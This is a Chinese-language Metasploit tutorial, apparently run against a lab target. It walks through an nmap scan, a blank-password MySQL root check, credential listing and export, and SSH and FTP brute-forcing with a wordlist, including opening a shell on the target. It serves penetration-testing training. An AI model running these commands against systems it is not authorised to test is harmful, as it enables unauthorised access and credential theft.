1.1 Metasploit攻击实例
1.1.1 攻击空密码的mysql服务
1.1.1.1 扫描主机并导入metasploit
# nmap -A -T4 -v 192.168.1.120 -oX /tmp/192.168.1.120.xml
msf6 > db_import /tmp/192.168.1.120.xml
msf6 > hosts -R 192.168.1.120

msf6 > services -R 192.168.1.120

1.1.1.2 验证主机是否存在mysql空密码漏洞
msf6 > search mysql type:auxiliary

msf6 > use auxiliary/scanner/mysql/mysql_login
msf6 auxiliary(scanner/mysql/mysql_login) > show options

msf6 auxiliary(scanner/mysql/mysql_login) > set USERNAME root
USERNAME => root
msf6 auxiliary(scanner/mysql/mysql_login) > set BLANK_PASSWORDS true
BLANK_PASSWORDS => true
msf6 auxiliary(scanner/mysql/mysql_login) > set RHOSTS 192.168.1.120
RHOSTS => 192.168.1.120
msf6 auxiliary(scanner/mysql/mysql_login) > run

1.1.1.3 查看Metasploit数据库中已保存的所有凭证
msf6 auxiliary(scanner/mysql/mysql_login) > creds

1.1.1.4 导出扫描结果给其他metasploit使用
注意：db_export 导出的是整个工作区的数据，其中可能包含 creds 中保存的凭证；/tmp 通常对本机其他用户可见，导出文件应按敏感数据保管，用完后及时删除。
msf6 auxiliary(scanner/mysql/mysql_login) > db_export -f xml /tmp/192.168.1.120-mysql.xml
[*] Starting export of workspace default to /tmp/192.168.1.120-mysql.xml [ xml ]...
[*] Finished export of workspace default to /tmp/192.168.1.120-mysql.xml [ xml ]...
1.1.2 暴力破解SSH
1.1.2.1 对ssh进行暴力破解
msf6 > search ssh_login

msf6 > use 0
msf6 auxiliary(scanner/ssh/ssh_login) > show options

msf6 auxiliary(scanner/ssh/ssh_login) > set RHOSTS 192.168.1.120
RHOSTS => 192.168.1.120
msf6 auxiliary(scanner/ssh/ssh_login) > set USERPASS_FILE /usr/share/metasploit-framework/data/wordlists/root_userpass.txt
USERPASS_FILE => /usr/share/metasploit-framework/data/wordlists/root_userpass.txt
msf6 auxiliary(scanner/ssh/ssh_login) > set STOP_ON_SUCCESS true
STOP_ON_SUCCESS => true
msf6 auxiliary(scanner/ssh/ssh_login) > exploit

1.1.2.2 破解后进行验证
ssh_login 在登录成功后会自动建立一个会话，下面用 sessions 列出会话并进入其中，确认登录确实有效。
msf6 auxiliary(scanner/ssh/ssh_login) > sessions

msf6 auxiliary(scanner/ssh/ssh_login) > sessions -i 8
[*] Starting interaction with 8...
whoami
msfadmin
ls
vulnerable
background
Background session 9? [y/N] y
1.1.3 暴力破解FTP
1.1.3.1 对ftp进行暴力破解
msf6 > search ftp_login

msf6 > use 0
msf6 auxiliary(scanner/ftp/ftp_login) > show options

msf6 auxiliary(scanner/ftp/ftp_login) > set RHOSTS 192.168.1.120
RHOSTS => 192.168.1.120
msf6 auxiliary(scanner/ftp/ftp_login) > set USERPASS_FILE /usr/share/metasploit-framework/data/wordlists/root_userpass.txt
USERPASS_FILE => /usr/share/metasploit-framework/data/wordlists/root_userpass.txt
msf6 auxiliary(scanner/ftp/ftp_login) > set STOP_ON_SUCCESS true
STOP_ON_SUCCESS => true
msf6 auxiliary(scanner/ftp/ftp_login) > exploit

